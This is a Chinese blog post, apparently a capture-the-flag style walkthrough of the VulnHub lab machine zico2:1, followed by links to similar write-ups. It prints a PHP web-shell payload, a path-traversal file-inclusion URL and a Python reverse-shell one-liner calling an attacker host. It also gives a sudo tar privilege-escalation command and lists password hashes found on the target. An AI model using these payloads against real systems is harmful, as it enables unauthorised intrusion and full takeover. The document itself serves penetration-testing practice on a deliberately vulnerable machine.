zico2:1

最新推荐文章于 2024-08-28 21:14:18 发布
最新推荐文章于 2024-08-28 21:14:18 发布
阅读量325 收藏 8
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/140857225
版权

一、主机发现

namp [ip]

二、信息收集

1.访问页面

往下化,点击

好像存在文件包含漏洞

存在

2.目录扫描

dirsearch -u http://192.168.7.78

3.访问/dbadmin

发现页面

3.尝试使用弱口令登录

admin登陆成功

ps:如果碰到弱口令爆不出的情况,可以使用以下方法

cewl http://192.168.x.x -w x.txt //抓取页面字典数据,生成文本文件

生成的文件

4.发现md5加密密码和用户名

解密1

653F4B285089453FE00E2AAFAC573414

解密2

96781A607F4E9F5F423AC01F0DAB0EBD

5.根据版本信息查询历史漏洞

searchsploit phpLiteAdmin

下载1.9.3对应的漏洞说明查看

searchsploit -m 24044.txt

根据提示查看路径下的文件

cat /usr/share/exploitdb/exploits/php/webapps/24044.txt

查看

翻译一下

6.根据漏洞说明进行操作,创建数据库

创建表

创建内容

<?php echo system($_GET[cmd]);?>

7.利用文件包含漏洞,访问创建的数据库

http://【IP】/view.php?page=../../usr/databases/shell.php

输入语句,可以执行命令

输入反弹语句

;export RHOST="【接受反弹ip】";export RPORT=1234;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

攻击机开启监听,监听成功

三、利用

1.执行响应shell代码

SHELL=/bin/bash script /dev/null

2.切换路径

cd /home/zico/wordpress

3.查看文件,发现密码

cat wp-config.php

4.ssh链接

四、提权

1.查看sudo提权

2.到网站查找利用代码

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

执行

3.提权成功

蓝天模糊
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub zico2: 1
箭雨镜屋
11-27 2872
本文攻击路径是:nmap扫描-->访问80端口发现文件包含漏洞-->dirb扫描网站目录-->利用默认密码登录phpLiteAdmin-->利用phpLiteAdmin 1.9.3的漏洞结合文件包含漏洞getshell-->脏牛提权(或者sudo tar提权)
VULNHUB靶机渗透——ZICO2:1
aarong的博客
12-15 1091
本渗透测试中使用的工具有Arp-scan(获取IP)、Nmap(获取目标开放端口和服务信息)、Dirb(网站目录爆破工具)、Zap(漏洞扫描工具)、在线密文破解工具等等。 \1) arp-scan扫描 NAT模式下,arp-scan扫描出靶机的IP:192.168.65.134 \2) Nmap扫描 获取开放端口及服务的全部信息 浏览器打开开启的网站 界面如下,是一个网络购物平台的网站。 \3) Dirb爆破 命令:dirb http://192.168.65.134 爆破结果发现类似于数
zico2: 1靶机
m0_61995767的博客
07-31 473
zico2: 1打靶记录
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 694
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
靶机渗透测试(zico2: 1)
@小张小张的博客
11-12 752
靶机渗透测试(): Vulnhub靶机 h 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(====) 目标:Close your eyes and feel the heat of being in the middle of the Chakravyuh. The Epic Battle formation that is said to uncrackable. Can you crack the Uncrackable? Does it
ZICO2: 1【附代码】(权限提升)
weixin_52487093的博客
08-04 684
ZICO2: 1【附代码】(权限提升)
红队打靶练习:ZICO2: 1
分享
12-16 402
红队打靶练习:ZICO2: 1 ,犹如雄狮怒吼般的压迫感.....
No.28-VulnHub-zico2: 1-Walkthrough渗透学习
qq_34801745的博客
01-23 1574
** VulnHub-zico2: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/zico2-1,210/ 靶机难度:中级(CTF) 靶机发布日期:2017年6月19日 靶机描述: Zico试图建立自己的网站,但在选择要使用的CMS时遇到了一些麻烦。在尝试了一些受欢迎的方法后,他决定建立自己的方法。那是个好主意吗? 提示:枚举,枚举和枚举!...
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3209
Vulnhub-Zico2靶机实战
VMware的Zico2虚拟机
05-12
1. 快速部署:由于Zico2已经预先安装好操作系统并进行了必要的配置,用户可以节省大量的安装和设置时间。 2. 隔离环境:每个虚拟机都是独立的,互不影响,适合进行软件测试、实验或隔离不同项目的工作空间。 3. 资源...
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门
7Riven's blog
01-29 931
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
安全面试常见问题任意文件下载
persist213的博客
08-24 733
吉祥知识星球《网安面试指南》《Java代码审计》《Web安全》《应急响应》《护网资料库》
经验笔记:Token、Session、Cookie 及密码级别安全存储
最新发布
qq_45831414的博客
08-28 327
在用户通过身份验证后,服务器会生成一个Token并发给客户端,之后客户端会在每次请求中附带此Token以证明身份。当用户开始与Web应用互动时,服务器会创建一个唯一的Session ID,并将其存储在客户端的Cookie中。本文将探讨如何利用Token、Session 和 Cookie 这三个概念来实现安全的用户认证及会话管理,并重点介绍如何存储密码以达到最高级别的安全性。综合运用Token、Session 和 Cookie,结合安全的密码存储技术,能够显著提高Web应用的安全性和用户体验。
“北京地铁系统中人脸识别技术的安全与效率问题研究”
matlabgoodboy的博客
08-28 363
综上所述,北京地铁系统中人脸识别技术的应用在提高安检和售检票效率方面具有显著优势,但同时也面临着数据隐私保护和滥用风险等安全问题。为了充分发挥人脸识别技术的优势并降低其风险,需要建立健全的法律法规和监管机制,并不断优化技术算法和管理手段。
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 545
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
你的软件系统安全
温故而知新
08-22 983
如果你的软件系统可以通过网络访问, 可以由多人操作, 可以访问或操作敏感数据, 或者可能暴露隐私, 等等, 请一定要保护你的系统. 那么你的软件系统安全吗? 一. 先问自己如下 4 个问题 1. What are we working on? 我们的系统在干啥? 例如电商系统: 我们在卖啥? 提供什么售前和售后服务? 用户和帐备信息怎么管理的? 数据是如何防护和归档的? 等等 2. What ...
云等保安全合规解决方案
bocco的博客
08-23 426
在此背景下,云等保(云安全等级保护)安全合规解决方案应运而生,旨在为企业构建一套全面、高效、符合国家安全标准的云安全防护体系。通过构建全面、高效、符合国家安全标准的云安全防护体系,企业不仅能够有效应对云环境中的安全挑战,还能够提升业务竞争力,实现可持续发展。它要求云服务提供商和云租户按照不同的安全等级,采取相应的安全控制措施,确保云环境中的数据、应用及基础设施免受未经授权的访问、使用、泄露、中断、破坏等安全威胁。1. 提升安全性:通过实施云等保,企业能够构建更加安全、可靠的云环境,有效抵御各类安全威胁。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值